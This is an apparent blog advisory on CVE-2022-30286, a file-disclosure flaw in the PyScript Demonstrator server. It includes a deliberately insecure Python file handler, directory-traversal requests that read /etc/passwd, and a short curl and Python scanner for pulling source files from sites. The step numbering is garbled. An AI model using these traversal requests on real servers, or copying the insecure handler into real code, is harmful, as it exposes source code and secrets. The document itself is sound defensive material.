In 2022, a serious vulnerability—CVE-2022-30286—was discovered in pyscriptjs, also known as PyScript Demonstrator. This flaw opened the door for attackers to remotely view sensitive Python code behind your online apps, all because of insecure design in how code requests were processed up until May 4, 2022.

Let's dive into what happened, how it works, and exactly how your source code could leak—with simple explanations and real code. At the end, you'll find references and ways to keep your projects safe.

What Is PyScript Demonstrator?

PyScript Demonstrator was an early playground for PyScript, a project that runs Python directly in the browser using WebAssembly and Pyodide. For learning and demos, it offered a lightweight HTTP server (pyscriptjs), which could deliver Python snippets and scripts for folks to test or show off.

The problem? The demo server had almost zero protection and handled file serving very naively. It trusted file paths sent in client requests, exposing Python source files to anyone on the internet.

The Core Issue

On every HTTP request, the server took the URL path or parameters and fetched the corresponding file on disk. There was barely any input validation or directory restrictions. This meant a remote attacker could trick the server into giving up the Python files behind the site—files not meant to be public.

Technical Details

Let's look at a stripped-down version of what the vulnerable code could look like (based on the real PyScript Demonstrator):

from http.server import SimpleHTTPRequestHandler, HTTPServer

class DemoHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        # Naively serve any file from the current directory
        if self.path.startswith('/files/'):
            filename = self.path[len('/files/'):]    # NO validation here!
            with open(filename, 'rb') as f:
                self.send_response(200)
                self.end_headers()
                self.wfile.write(f.read())
            return
        super().do_GET()

What's wrong here?

- filename is controlled by the user via the URL (/files/mysecret.py).

1. Find the vulnerable endpoint

Visit a site running the demo (e.g., http://example.com/files/).

Try to read main.py (assuming it's not meant for users)

GET http://example.com/files/main.py

3. Receive the source code!

If successful, the server responds with the full Python code. An attacker can iterate through common names (app.py, settings.py, etc.), or brute-force filenames.

Try to climb directories

GET http://example.com/files/../secrets.py


or even

GET http://example.com/files/../../etc/passwd

Depending on server's run location and permissions, sensitive files outside the intended folder could be revealed!

What Can Attackers Actually Do?

- Steal Your Source Code: Secret business logic, API keys (if hardcoded), or intellectual property can be downloaded.
- Find Other Vulnerabilities: Reviewing internal code gives clues for deeper attacks—like hardcoded passwords or weak algorithms.
- Wider Server Exposure: If directory traversal is possible, attackers might see environment files (.env), password lists, or system info.

Who Was Affected?

- Anyone running pre-May 2022 versions of PyScript Demonstrator (pyscriptjs) in a public or private web space.

You could use a simple tool like curl or Python scripts for automated scanning

curl http://victimsite.com/files/app.py

Or in Python

import requests

url = "http://victimsite.com/files/app.py"
resp = requests.get(url)
if resp.status_code == 200:
    print("[+] Got source!")
    print(resp.text)
else:
    print("[-] Not found or patched.")

Mitigation & Patch

- Upgrade/Patch: The vulnerability was fixed here on May 4, 2022 by restricting file access, sanitizing input, and mounting a virtual "files" root.
- Never Trust User Input: Always sanitize and validate paths. Use built-in security features like Python's os.path or, even better, frameworks that handle this securely.

Minimize Exposed Files: Only make files public if they need to be.

- Security Reviews for Demo Servers: Even for demo tools, always assume they're accessible by attackers.

References

1. NVD CVE-2022-30286 Entry
2. Original Issue on GitHub
3. PyScriptjs Patch Commit
4. PyScript Official

Summary

CVE-2022-30286 is a classic file disclosure bug, made more serious by the trust people put in demo tools. It shows why even "non-production" code needs security reviews. If you're building with Python and HTTP, always take file serving seriously!

Is your demo server still running an old version? Patch or restrict it now—before someone pokes around your source!


*© 2024. For educational use only. Don’t exploit live systems without permission.*

Timeline

Published on: 05/09/2022 12:15:00 UTC
Last modified on: 05/16/2022 18:47:00 UTC